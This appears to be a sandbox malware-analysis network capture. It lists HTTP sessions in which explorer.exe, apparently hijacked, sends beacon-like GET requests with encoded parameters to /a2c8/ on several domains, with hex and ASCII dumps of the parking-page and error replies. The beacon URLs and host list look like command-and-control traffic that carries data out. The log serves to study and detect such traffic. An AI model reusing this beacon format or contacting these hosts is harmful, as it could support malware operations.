                                                                                                                                                                                        Jun 10, 2022 07:53:31.159643888 CEST8594INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                                                                                                        Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                                                                                                        Jun 10, 2022 07:53:31.159674883 CEST8594INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        3192.168.11.204977582.98.135.4480C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:53:51.621572971 CEST8602OUTGET /a2c8/?Djf=8QcX/9a8ci5Vn1nUgpALxBO0i5LJh4pOXEYLQ5+l8i6jeOxjgCEcajHz4AJyUtveARY+&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.somosnuecru.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:53:51.656706095 CEST8603INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:53:51 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Age: 0
                                                                                                                                                                                        Server: HTTPd
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Length: 1229
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 42 65 67 69 6e 20 74 65 6d 70 6c 61 74 65 3d 22 2f 54 65 6d 70 6c 61 74 65 73 2f 70 61 72 6b 69 6e 67 2e 64 77 74 22 20 63 6f 64 65 4f 75 74 73 69 64 65 48 54 4d 4c 49 73 4c 6f 63 6b 65 64 3d 22 66 61 6c 73 65 22 20 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 42 65 67 69 6e 45 64 69 74 61 62 6c 65 20 6e 61 6d 65 3d 22 64 6f 63 74 69 74 6c 65 22 20 2d 2d 3e 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 45 6e 64 45 64 69 74 61 62 6c 65 20 2d 2d 3e 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 73 6f 6d 6f 73 6e 75 65 63 72 75 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 68 6f 72 74 63 75 74 20 49 63 6f 6e 22 20 68 72 65 66 3d 22 2e 2e 2f 2e 2e 2f 2e 2e 2f 69 6d 61 78 65 73 2f 62 61 73 65 2f 65 73 74 72 75 63 74 75 72 61 5f 62 61 73 65 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 70 61 72 6b 69 6e 67 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0a 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 42 65 67 69 6e 45 64 69 74 61 62 6c 65 20 6e 61 6d 65 3d 22 68 65 61 64 22 20 2d 2d 3e 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 45 6e 64 45 64 69 74 61 62 6c 65 20 2d 2d 3e 0a 3c 2f 68 65 61 64 3e 09 09 09 0a 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 42 65 67 69 6e 45 64 69 74 61 62 6c 65 20 6e 61 6d 65 3d 22 49 6e 69 63 69 6f 20 6e c2 ba 20 70 6c 61 6e 74 69 c3 b1 61 22 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 72 6b 69 6e 67 5f 30 31 22 3e 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 45 6e 64 45 64 69 74 61 62 6c 65 20 2d 2d 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 62 65 63 65 69 72 61 20 63 6c 65 61 72 5f 69 6e 74 65 72 6e 6f 22 3e 0a 09 09 09 3c 68 31 3e 77 77 77 2e 73 6f 6d 6f 73 6e 75 65 63 72 75 2e 63 6f 6d 3c 2f 68 31 3e 0a 09 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 72 70 6f 20 63 6c 65 61 72 5f 69 6e 74 65 72 6e 6f 22 3e 0a 09 09 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 42 65 67 69 6e 45 64 69 74 61 62 6c 65 20 6e 61 6d 65 3d 22 69 6d 61 78 65 22 20 2d 2d 3e 0a 09 09 3c 69 6d 67 20 73 72 63 3d 22 69 6d 61 78 65 73 2f 70 61 72 6b 69 6e 67 5f 30 31 2e 6a 70 67 22 20 77 69 64 74 68 3d 22 39 39 34 22 20 68 65 69 67 68 74 3d 22 36 35 37 22 20 61 6c 74 3d 22 69 6d 61 78 65 22 20 74 69 74 6c 65 3d 22 69 6d 61 78 65 22 20 2f 3e 0a 09 09 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 45 6e 64 45 64 69 74 61 62 6c 65 20 2d 2d 3e 0a 09 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 42 65 67 69 6e 45 64 69 74 61 62 6c 65 20 6e 61 6d 65 3d 22
                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">... InstanceBegin template="/Templates/parking.dwt" codeOutsideHTMLIsLocked="false" --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />... InstanceBeginEditable name="doctitle" -->... InstanceEndEditable --><title>www.somosnuecru.com</title><link rel="Shortcut Icon" href="../../../imaxes/base/estructura_base/favicon.ico" /><link href="css/parking.css" rel="stylesheet" type="text/css" media="screen" />... InstanceBeginEditable name="head" -->... InstanceEndEditable --></head><body>... InstanceBeginEditable name="Inicio n plantia" --><div class="parking_01">... InstanceEndEditable --><div class="cabeceira clear_interno"><h1>www.somosnuecru.com</h1></div><div class="corpo clear_interno">... InstanceBeginEditable name="imaxe" --><img src="imaxes/parking_01.jpg" width="994" height="657" alt="imaxe" title="imaxe" />... InstanceEndEditable --></div>... InstanceBeginEditable name="
                                                                                                                                                                                        Jun 10, 2022 07:53:51.656752110 CEST8603INData Raw: 46 69 6e 20 6e c2 ba 20 70 6c 61 6e 74 69 c3 b1 61 22 20 2d 2d 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 45 6e 64 45 64 69 74 61 62 6c 65 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 21 2d 2d 20 49 6e 73 74 61 6e 63 65 45 6e
                                                                                                                                                                                        Data Ascii: Fin n plantia" --></div>... InstanceEndEditable --></body>... InstanceEnd --></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        4192.168.11.204977699.83.175.8080C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:54:11.977322102 CEST8604OUTGET /a2c8/?6lbL=qTfTz0&Djf=blgq+MwijlPLtn18EK/mFFgLQ7saUAegRg4nsKXdDvXqvzc0FmI2dz5pRjRE3XI8Zh+s HTTP/1.1
                                                                                                                                                                                        Host: www.cardviews.net
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:54:12.124811888 CEST8604INHTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:54:12 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Content-Length: 146
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        5192.168.11.2049779216.58.212.14780C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:54:52.807904005 CEST8619OUTGET /a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrFY0ZIvsissWy0gTwQZvavuGdAMd62WneJYeLezb4bPLeN5mqTMt96tJ/I HTTP/1.1
                                                                                                                                                                                        Host: www.belajarakuntansipajak.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131586075 CEST8620INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:54:53 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                        Server: GSE
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 34 30 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 20 6c 61 6e 67 3d 27 69 64 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 23 34 32 34 61 35 36 27 20 6e 61 6d 65 3d 27 74 68 65 6d 65 2d 63 6f 6c 6f 72 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 23 34 32 34 61 35 36 27 20 6e 61 6d 65 3d 27 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 27 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 62 6c 6f 67 67 65 72 27 20 6e 61 6d 65 3d 27 67 65 6e 65 72 61 74 6f 72 27 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 2f 61 32 63 38 2f 3f 36 6c 62 4c 3d 71 54 66 54 7a 30 26 44 6a 66 3d 43 34 51 74 4c 31 32 33 55 71 72 46 59 30 5a 49 76 73 69 73 73 57 79 30 67 54 77 51 5a 76 61 76 75 47 64 41 4d 64 36 32 57 6e 65 4a 59 65 4c 65 7a 62 34 62 50 4c 65 4e 35 6d 71 54 4d 74 39 36 74 4a 2f 49 27 20 72 65 6c 3d 27 63 61 6e 6f 6e 69 63 61 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 65 6c 61 6a 61 72 20 41 6b 75 6e 74 61 6e 73 69 20 50 65 72 70 61 6a 61 6b 61 6e 20 2d 20 41 74 6f 6d 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 65 6c 61 6a 61 72 20 41 6b 75 6e 74 61 6e 73 69 20 50 65 72 70 61 6a 61 6b 61 6e 20 2d 20 52 53 53 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 65 6c 61 6a 61 72 61 6b 75 6e 74 61 6e 73 69 70 61 6a 61 6b 2e 63 6f 6d 2f 66 65 65 64 73 2f 70 6f 73 74 73 2f 64 65 66 61 75 6c 74 3f 61 6c 74 3d 72 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 65 72 76
                                                                                                                                                                                        Data Ascii: 4022<!DOCTYPE html><html dir='ltr' lang='id'><head><meta content='width=device-width, initial-scale=1' name='viewport'/><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/><meta content='#424a56' name='theme-color'/><meta content='#424a56' name='msapplication-navbutton-color'/><meta content='blogger' name='generator'/><link href='http://www.belajarakuntansipajak.com/favicon.ico' rel='icon' type='image/x-icon'/><link href='http://www.belajarakuntansipajak.com//a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrFY0ZIvsissWy0gTwQZvavuGdAMd62WneJYeLezb4bPLeN5mqTMt96tJ/I' rel='canonical'/><link rel="alternate" type="application/atom+xml" title="Belajar Akuntansi Perpajakan - Atom" href="http://www.belajarakuntansipajak.com/feeds/posts/default" /><link rel="alternate" type="application/rss+xml" title="Belajar Akuntansi Perpajakan - RSS" href="http://www.belajarakuntansipajak.com/feeds/posts/default?alt=rss" /><link rel="serv
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131685019 CEST8622INData Raw: 69 63 65 2e 70 6f 73 74 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 61 74 6f 6d 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 42 65 6c 61 6a 61 72 20 41 6b 75 6e 74 61 6e 73 69 20 50 65 72 70 61 6a 61 6b 61 6e 20 2d 20 41 74 6f 6d 22 20
                                                                                                                                                                                        Data Ascii: ice.post" type="application/atom+xml" title="Belajar Akuntansi Perpajakan - Atom" href="https://www.blogger.com/feeds/8705703672450234790/posts/default" /><meta content='http://www.belajarakuntansipajak.com//a2c8/?6lbL=qTfTz0&Djf=C4QtL123UqrF
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131748915 CEST8623INData Raw: 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 31 46 30 30 2d 31 46 46 46 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f
                                                                                                                                                                                        Data Ascii: c4EsA.woff2) format('woff2');unicode-range:U+1F00-1FFF}@font-face{font-family:Roboto;font-style:normal;font-weight:300;font-display:swap;src:url(https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2) format('woff2');unicode-
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131809950 CEST8624INData Raw: 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 30 34 36 30 2d 30 35 32 46 2c 55 2b 31 43 38 30 2d 31 43 38 38 2c 55 2b 32 30 42 34 2c 55 2b 32 44 45 30 2d 32 44 46 46 2c 55 2b 41 36 34 30 2d 41 36 39 46 2c 55 2b 46 45 32 45 2d 46 45 32 46 7d
                                                                                                                                                                                        Data Ascii: ;unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F}@font-face{font-family:Roboto;font-style:normal;font-weight:400;font-display:swap;src:url(https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Mu5mxKOzY.woff2) f
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131870031 CEST8626INData Raw: 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 73 77 61 70 3b 73 72 63 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 32 30 2f 4b 46 4f 6d 43 6e 71 45
                                                                                                                                                                                        Data Ascii: ight:400;font-display:swap;src:url(https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Mu4mxK.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131937027 CEST8627INData Raw: 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 55 2b 30 31 30 32 2d 30 31 30 33 2c 55 2b 30 31 31 30 2d 30 31 31 31 2c 55 2b 30 31 32 38 2d 30 31 32 39 2c 55 2b 30 31 36 38 2d 30 31
                                                                                                                                                                                        Data Ascii: woff2) format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+1EA0-1EF9,U+20AB}@font-face{font-family:Roboto;font-style:normal;font-weight:700;font-display:swap;src:url(https://fonts.gstatic.com
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132034063 CEST8628INData Raw: 62 75 74 65 73 29 7d 66 75 6e 63 74 69 6f 6e 20 45 28 65 29 7b 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 28 6e 7c
                                                                                                                                                                                        Data Ascii: butes)}function E(e){i.head.appendChild(e)}function N(e,n){return[].slice.call((n||i).querySelectorAll(e))}function x(e){a(function(o){o=N(e||"[type=deferjs]"),function e(n,t){(n=o.shift())&&(n.parentNode.removeChild(n),(t=function(e,n,t,o,i){
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132132053 CEST8630INData Raw: 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 70 61 67 65 2d 73 6b 69 6e 2d 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 21 2d 2d 0a 2f 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                                                                                                                                                                                        Data Ascii: ript><style id='page-skin-1' type='text/css'>.../* -----------------------------------------------Blogger Template StyleName: linkmagzVersion: 3.0.0Designer: Mas Sugeng----------------------------------------------- */html {font
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132220030 CEST8631INData Raw: 3b 0a 7d 0a 2e 6e 61 76 6d 65 6e 75 2c 0a 2e 6d 65 6e 75 2d 73 74 69 63 6b 79 20 7b 0a 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 2e 32 73 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 34 37 41 39 32 0a 7d 0a 23 6e 61 76 6d 65 6e 75 2d 73 69
                                                                                                                                                                                        Data Ascii: ;}.navmenu,.menu-sticky {transition: all .2s;background:#547A92}#navmenu-sidebar-body ul li a {color: #636363}#navmenu-sidebar-body ul li a:hover {color: #2675A6}.ms-submenu-button::after {border-color: #636363 transparent transp
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132314920 CEST8633INData Raw: 68 32 2e 74 69 74 6c 65 20 7b 0a 74 72 61 6e 73 69 74 69 6f 6e 3a 20 61 6c 6c 20 2e 32 73 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 61 66 61 0a 7d 0a 61 2e 62 6c 6f 67 2d 70 61 67 65 72 2d 6f 6c 64 65 72 2d 6c 69 6e 6b 3a 3a 61 66 74 65
                                                                                                                                                                                        Data Ascii: h2.title {transition: all .2s;background:#f8fafa}a.blog-pager-older-link::after,a.blog-pager-newer-link::before {border:solid #FFFFFF}.blog-pager a.js-load,.blog-pager span.js-loaded,.blog-pager span.js-loading,.blog-pager a.blog-pa
                                                                                                                                                                                        Jun 10, 2022 07:54:53.140805006 CEST8634INData Raw: 2d 74 69 74 6c 65 7b 0a 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 0a 7d 0a 2e 64 61 72 6b 6d 6f 64 65 2d 73 77 69 74 63 68 20 2e 73 6c 69 64 65 72 7b 0a 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 46 46 46 46 46 46 0a 7d 0a 2e 64 61 72 6b
                                                                                                                                                                                        Data Ascii: -title{color:#FFFFFF}.darkmode-switch .slider{border:2px solid #FFFFFF}.darkmode-switch .slider:before {transition: all .2s;background:#FFFFFF}.darkmode-switch .switch:hover .slider:before {background:#FFFFFF}.iconsearch-label {t


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        6192.168.11.2049780198.54.117.21180C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:55:13.474087000 CEST8637OUTGET /a2c8/?Djf=hAb1bfA3kdRzRDaFO/Xjxrg/eigTyfVAv6myO+nVVHigx1EEc3JcIrberUsYxkjlMdL+&6lbL=qTfTz0 HTTP/1.1
                                                                                                                                                                                        Host: www.cocodetteexciple.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        7192.168.11.2049781154.219.125.7980C:\Windows\explorer.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Jun 10, 2022 07:55:34.508928061 CEST8638OUTGET /a2c8/?6lbL=qTfTz0&Djf=idqIzuqk2a5vjoGSbf9Bcwe0DWiZK+YeMoSyFHNnMaplLV0sCAEI7n55HlOgc8kmWb4X HTTP/1.1
                                                                                                                                                                                        Host: www.outletgals.com
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                        Jun 10, 2022 07:55:34.713819027 CEST8640INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 10 Jun 2022 05:55:34 GMT
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                        Content-Length: 1910
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 be b0 b5 c2 d5 f2 b4 d2 cf d7 d0 c2 c4 dc d4 b4 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 38 32 33 3b 26 23 32 33 36 31 37 3b 26 23 33 32 39 32 39 3b 26 23 33 30 33 33 33 3b 26 23 32 37 39 37 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 2c 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 33 33 33 39 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 38 32 35 3b 26 23 32 32 38 32 35 3b 26 23 32 33 35 36 37 3b 26 23 32 39 32 35 35 3b 2c 26 23 33 39 36 34 30 3b 26 23 32 38 35 32 36 3b 26 23 31 31 38 3b 26 23 31 30 35 3b 26 23 31 30 30 3b 26 23 31 30 31 3b 26 23 31 31 31 3b 26 23 31 31 35 3b 26 23 31 31 31 3b 26 23 31 31 34 3b 26 23 31 30 33 3b 26 23 39 37 3b 26 23 31 31 35 3b 26 23 31 30 39 3b 26 23 32 35 32 37 37 3b 26 23 32 35 36 31 36 3b 26 23 32 31 35 31 32 3b 26 23 33 38 35 39 38 3b 2c 26 23 32 32 39 30 39 3b 26 23 32 30 31 30 32 3b 26 23 39 37 3b 26 23 31 31 38 3b 26 23 33 31 35 33 32 3b 26 23 32 32 32 33 35 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 38 37 33 38 3b 26 23 33 38 37 33 38 3b 26 23 33 33 36 30 